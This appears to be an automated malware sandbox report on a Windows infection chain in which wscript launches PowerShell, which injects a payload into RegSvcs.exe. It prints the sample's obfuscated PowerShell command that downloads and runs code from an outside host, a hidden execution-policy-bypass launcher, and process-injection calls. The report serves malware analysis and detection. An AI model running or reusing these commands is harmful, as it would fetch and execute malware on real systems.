                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: Binary string: NewPE2.pdb source: powershell.exe, 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: NewPE2.pdb(@ source: powershell.exe, 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Windows\System32\wscript.exe  Anti Malware Scan Interface: .Run("POWeRSHeLL [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';", "0", "true");
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, EwV3ECxYhIse1SOarW.cs  .Net Code: uDdV8u69VKLnNev38PJ(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{uDdV8u69VKLnNev38PJ(typeof(IntPtr).TypeHandle),typeof(Type)})
                Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, EwV3ECxYhIse1SOarW.cs  .Net Code: uDdV8u69VKLnNev38PJ(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{uDdV8u69VKLnNev38PJ(typeof(IntPtr).TypeHandle),typeof(Type)})
                Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, IupxYtKFNoaX.cs  .Net Code: lyDvXmXrrCN System.AppDomain.Load(byte[])
                Source: C:\Windows\System32\wscript.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
                Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 1_2_00007FFD9B7554FA push eax; iretd 1_2_00007FFD9B755561
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 1_2_00007FFD9B7500AD pushad ; iretd 1_2_00007FFD9B7500C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 1_2_00007FFD9B823AF0 push eax; retf 1_2_00007FFD9B823AF1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 6_2_00007FFD9B7200AD pushad ; iretd 6_2_00007FFD9B7200C1
                Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, cbljdLySIgCA.cs  High entropy of concatenated method names: 'dhCeQmXpcgyBijcH', 'DJqzKtqrUbJ', 'uNPuvhbzfHhJyh', 'cqrFuRFwWGTK', 'WcOIUbsIrHPR', 'iaoKesjYfLxq', 'dUZBovZRQcd', 'kUYsJfvWWgp', 'zhZTwzLNlfrm', 'OEVVqFZcPutM'
                Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, RocSfwPnWyktz.cs  High entropy of concatenated method names: 'XTdVrOsCOSbN', 'buLxhepmFGXlsko', 'xxmaXoaMBoR', 'UDBGHeLamrX', 'gASjXIDzFqKYKVv', 'wJvgTekLqkAq', 'OSZytWtuysTRtA', 'jqhhElYvYyJBhtU', 'iasWvLXcFTewc', 'GBJGdGbhYY'
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, EwV3ECxYhIse1SOarW.cs  High entropy of concatenated method names: 'coIv6gaxrKyOU6UxhGB', 'YmKxVlaSSMxjg7yeSZr', 'BPTavEfPI8', 'pdaPcya8thctOw7jJPR', 'e52AmiaR6Zmb9lryLLG', 'VFhmi5apOUL45Layo85', 's7lkoDagZ7SB5rZQITN', 'q7yQT6aJ19wG5Ff3PrV', 'eUANGaaiQTIQvIro7Lh', 'yOG8BOaIDUqRkTkYGTt'
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, geUwbRLwd0WNm7K3QP.cs  High entropy of concatenated method names: 'rkesS35Cky', 'auIkQH6o4NfXZEtqLWo', 'UtNfEh6dtiuHEv5GyR3', 'tobPIO6cNsowhYm6JYZ', 'z08y4G6OJTjebtPXsBe', 'xM0xGg6Dv9ifjCVCALk', 's2oSNh6kHwXWCjPNT1e', 'RHJgFS6jYOqPmd8yqch', 'HCgwjo6NdCdqwgS1jXN'
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, Native.cs  High entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'M2DDfJCjDKI6dkvGbUU', 'HytCt3CceuoYVLARgTH', 'asbBtkCOLuWCxWmxMrH', 'iPe0TGCNg1ulsrFuGHe', 'XE084OCYFp6QURxQXNM', 'xNDrW9CmxlBnIETjTvQ'
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, Str.cs  High entropy of concatenated method names: 'ReverseString', 'BinaryToString', 'yRVbf4CTORcmD8WTJOo', 'CGyNH1CXiymcSWZhYiZ', 'fAYOIbCErgtjxemufl3', 'Y23WHXCwRSKNSXICkhU', 'IvO6ajC1bhZeT4AHTEO', 'vHGAm5CepTLTEblhDwj', 'Vx8Qx4CvcsaBOBt7IZf', 'n2p6k0CrwoLDc063WAb'
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, PE.cs  High entropy of concatenated method names: 'Execute', 'muFoq8CAseaYDIPspOv', 'KRwVQXCGtZfeLlAnof5', 'arNOAMCxGMOePGZ8BMp', 'nnjcWOCSyXwHiJoVevG', 'Tvu02TCfqoPNp1rrRW2', 'nFaWI9Cl6YnHEcOun9x', 'oUX4ckCK7QI2rXqWGRQ', 'GFGnodC8lHNWHj6unEy', 'wBS7MKCRFTgjZ1Q4fVT'
                Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, EwV3ECxYhIse1SOarW.cs  High entropy of concatenated method names: 'coIv6gaxrKyOU6UxhGB', 'YmKxVlaSSMxjg7yeSZr', 'BPTavEfPI8', 'pdaPcya8thctOw7jJPR', 'e52AmiaR6Zmb9lryLLG', 'VFhmi5apOUL45Layo85', 's7lkoDagZ7SB5rZQITN', 'q7yQT6aJ19wG5Ff3PrV', 'eUANGaaiQTIQvIro7Lh', 'yOG8BOaIDUqRkTkYGTt'
                Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, geUwbRLwd0WNm7K3QP.cs  High entropy of concatenated method names: 'rkesS35Cky', 'auIkQH6o4NfXZEtqLWo', 'UtNfEh6dtiuHEv5GyR3', 'tobPIO6cNsowhYm6JYZ', 'z08y4G6OJTjebtPXsBe', 'xM0xGg6Dv9ifjCVCALk', 's2oSNh6kHwXWCjPNT1e', 'RHJgFS6jYOqPmd8yqch', 'HCgwjo6NdCdqwgS1jXN'
                Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, Native.cs  High entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'M2DDfJCjDKI6dkvGbUU', 'HytCt3CceuoYVLARgTH', 'asbBtkCOLuWCxWmxMrH', 'iPe0TGCNg1ulsrFuGHe', 'XE084OCYFp6QURxQXNM', 'xNDrW9CmxlBnIETjTvQ'
                Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, Str.cs  High entropy of concatenated method names: 'ReverseString', 'BinaryToString', 'yRVbf4CTORcmD8WTJOo', 'CGyNH1CXiymcSWZhYiZ', 'fAYOIbCErgtjxemufl3', 'Y23WHXCwRSKNSXICkhU', 'IvO6ajC1bhZeT4AHTEO', 'vHGAm5CepTLTEblhDwj', 'Vx8Qx4CvcsaBOBt7IZf', 'n2p6k0CrwoLDc063WAb'
                Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, PE.cs  High entropy of concatenated method names: 'Execute', 'muFoq8CAseaYDIPspOv', 'KRwVQXCGtZfeLlAnof5', 'arNOAMCxGMOePGZ8BMp', 'nnjcWOCSyXwHiJoVevG', 'Tvu02TCfqoPNp1rrRW2', 'nFaWI9Cl6YnHEcOun9x', 'oUX4ckCK7QI2rXqWGRQ', 'GFGnodC8lHNWHj6unEy', 'wBS7MKCRFTgjZ1Q4fVT'

                Boot Survival

                Source: Yara match  File source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE
                Source: Yara match  File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match  File source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match  File source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                Source: Yara match  File source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR
                Source: C:\Windows\System32\wscript.exe  Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exe  Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                Source: Yara match | File source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR
                Source: powershell.exe, 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3568
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6269
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3907
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5867
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 1641
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 8177
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164 | Thread sleep time: -10145709240540247s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6396 | Thread sleep count: 3907 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6396 | Thread sleep count: 5867 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5868 | Thread sleep time: -18446744073709540s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File Volume queried: C:\ FullSizeInformation
                Source: RegSvcs.exe, 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: vmware
                Source: RegSvcs.exe, 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
                Source: wscript.exe, 00000000.00000003.1659330673.000002092EA47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092E9A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659367243.000002092E9DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000001.00000002.1748798903.0000021EA6150000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\System32\wscript.exe | Network Connect: 192.185.141.13 443
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, Native.cs | Reference to suspicious API methods: hZtBkRIAsdEfXyYT8l.DKNdSqYsy(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), eNT4yUcAs2TV1EOUTN.DKNdSqYsy(typeof(CreateApi).TypeHandle, eNT4yUcAs2TV1EOUTN.NP4OpjU4s), hZtBkRIAsdEfXyYT8l.mQhtqTkRs)
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, PE.cs | Reference to suspicious API methods: Native.WriteProcessMemory(processInformation.ProcessHandle, num10 + num16, array3, array3.Length, ref bytesWritten)
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, PE.cs | Reference to suspicious API methods: Native.ReadProcessMemory(processInformation.ProcessHandle, num5 + 8, ref buffer2, 4, ref bytesWritten)
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, PE.cs | Reference to suspicious API methods: x42mfHCtV6jaJIpPla7(Native.VirtualAllocEx, processInformation.ProcessHandle, num6, length, 12288, 64)
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D94008
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
